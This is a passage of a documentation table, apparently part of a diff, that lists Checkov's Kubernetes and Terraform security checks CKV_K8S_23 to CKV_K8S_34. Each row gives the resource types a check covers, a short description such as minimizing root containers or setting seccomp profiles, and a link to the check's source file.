+| 2739 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2740 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2741 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2742 | CKV_K8S_23 | resource | ReplicationController | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2743 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2744 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) |
+| 2745 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) |
+| 2746 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2747 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2748 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2749 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2750 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2751 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2752 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2753 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2754 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2755 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2756 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2757 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2758 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2759 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2760 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2761 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2762 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2763 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2764 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2765 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2766 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2767 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2768 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2769 | CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2770 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2771 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2772 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2773 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2774 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2775 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2776 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2777 | CKV_K8S_27 | resource | Job | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2778 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2779 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2780 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2781 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2782 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2783 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2784 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2785 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2786 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2787 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2788 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2789 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2790 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2791 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2792 | CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2793 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2794 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2795 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2796 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2797 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2798 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2799 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2800 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2801 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2802 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2803 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2804 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2805 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2806 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2807 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2808 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2809 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2810 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2811 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2812 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2813 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2814 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2815 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2816 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2817 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2818 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2819 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2820 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2821 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2822 | CKV_K8S_30 | resource | PodTemplate | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2823 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2824 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2825 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2826 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 2827 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 2828 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 2829 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 2830 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2831 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2832 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2833 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2834 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2835 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2836 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2837 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 2838 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) |
+| 2839 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) |
+| 2840 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2841 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2842 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2843 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2844 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2845 | CKV_K8S_33 | resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2846 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2847 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2848 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2849 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 2850 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 2851 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 2852 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 2853 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | 
Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2854 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2855 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2856 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2857 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2858 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2859 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2860 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2861 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2862 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller 
